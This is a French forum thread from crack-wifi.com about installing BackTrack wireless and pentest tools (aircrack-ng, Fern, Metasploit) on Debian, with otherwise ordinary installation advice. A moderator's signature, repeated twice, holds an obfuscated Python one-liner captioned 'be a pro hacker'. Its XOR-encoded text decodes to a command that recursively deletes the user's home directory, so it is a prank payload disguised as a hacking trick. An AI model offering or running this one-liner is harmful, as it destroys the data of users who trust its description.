Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 20-09-2012 17:47:51

arcare
Membre Actif

Debian

Bonjours à tous et à toutes.

Je suis actuellement avec la distrib backtrack (je me fais la main) et voila, j'ai une forte envie de passer sous Debian.

Ma question est donc simple:

Est-il possible d'avoir sous la version LA PLUS RECENTE de Debian, les tools backtrack de base (aircrack, fren, gerix, metasploit, etc) ?

PS: si c'est pour me dire  "tu as pas chercher l'info", évitez ^^ (si je post cette demande c'est que je n'ai pas trouvé) smile

Voilou, j'imagine que cela est possible mais j'ai aussi lu que les dépôt aircrack étaient stoppé depuis quelques temps.

Merci d'avance a tout ceux qui répondrons smile

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 20-09-2012 19:25:53

antares145
Membre d'honneur
Site Web

Re : Debian

Ta question est peut-être simple mais mal posée wink Debian a un cycle de release un peu particulier qui fait que "la plus récente" peut avoir différentes significations :
- la dernière version Stable, la 6.0 "Squeeze" ?
- la dernière Testing en cours de développement, Wheezy ?
- la dernière Unstable, aussi connue sous le nom de "Sid" ?
La stable est SUPER-stable, mais les logiciels ne sont pas à jour (sauf bugs critiques). La Sid dispose des tous derniers logiciels, mais c'est elle qui a le plus de bugs. La Testing est intermédiaire, c'est sans doute avec celle-là que tu vas commencer...

Ensuite, tu as une définition amusant des "tools backtrack de base" : ce sont peut-être les seuls que tu utilises, mais je trouve ta liste fort restrictive et trop orientée Wireless. BackTrack, c'est beaucoup plus large que ça smile Soit...

- aircrack-ng, même sans les dépôts, se compile et s'installe en 5 minutes. Plus d'infos ici --> Aircrack-ng et ubuntu 12.04

- fren je connais pas (d'après les fans de Star trek ça serait une forme de poisson, mais je suppose que c'est pas de ça que tu parles). Je suppose que tu parles de Fern, il y a un package .DEB sur le site officiel donc ça devrait être bon...

- Gerix ne semble plus développé (pas moyen de tomber sur le site officiel). Il vaut mieux te rabattre sur des alternatives comme Fern ou GrimWepa Wifite

- Metasploit, à ma connaissance, ne propose pas de package mais il est récupérable facilement par SVN. Il faut "juste" installer Ruby et quelques dépendances qui peuvent être un peu pénibles (je pense entre autres à Postgresql), au moins sous BackTrack c'est intégré. mais pour l'usage de base, c'est assez facile à "installer" sur Debian wink

Il y aura toujours moyen d'installer lesl ogiciels dont tu as besoin sous Debian. Par contre, tu auras rarement de beaux paquets dans les dépôts qui s'installent proprement. Ou bien tu travailles avec checkinstall pour intégrer ça comme tu peux, ou bien tu fais tout "à la main", moins propre mais souvent plus simple tongue

#3 20-09-2012 19:46:37

spawn
Modérateur

+1 tout est dit.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#4 20-09-2012 20:05:53

goliate
Membre Irremplaçable
Site Web

arcare a écrit :

Voilou, j'imagine que cela est possible mais j'ai aussi lu que les dépôt aircrack étaient stoppé depuis quelques temps.

Merci d'avance a tout ceux qui répondrons smile

Voila, je croit que tout et dit.

la solution et de compiler toi même aircrack.

arcare a écrit :

PS: si c'est pour me dire  "tu as pas chercher l'info", évitez ^^ (si je post cette demande c'est que je n'ai pas trouvé) smile

Tu n'as pas chercher => par là

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#5 24-09-2012 16:33:34

arcare
Membre Actif

Bonjour ! et bien je vous dit un grand merci pour vos réponses très rapides !

Je vais me mettre à pofiner tout ce que vous venez de me dire smile

Merci surtout à toi antares, ta réponse est très bien expliquée. En effet je m'exprime peut être mal et je suis d'accord avec toi, les tools que j'ai cités sont très restrictifs quant au nombre de tools qu'il y a sous BT. En effet ce sont ceux que j'utilise (du moins que j'essaye d'utiliser) mais avouons que ce sont en général ceux ci auquel on commence à s’intéresser quand on débute sous BT ?

Merci goliate pour le petit lien, en fait je l'avais vu (avant de pencher pour Debian), mais je n'avais pas fais le lien avec Debian

Ps: quand je parlais de la dernière version je parlais de la version stable (je ne l'ai pas précisé désolé hmm)

#6 24-09-2012 17:46:38

spawn
Modérateur

Franchement ne prend pas lenny. Wheezy est bien plus complète.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#7 24-09-2012 21:47:11

arcare
Membre Actif

Pour le moment je n'ai encore rien installé physiquement.

Je me documente mais j'avoue que quand on touche a Debian ca devient de suite plus complexe.

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.028 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]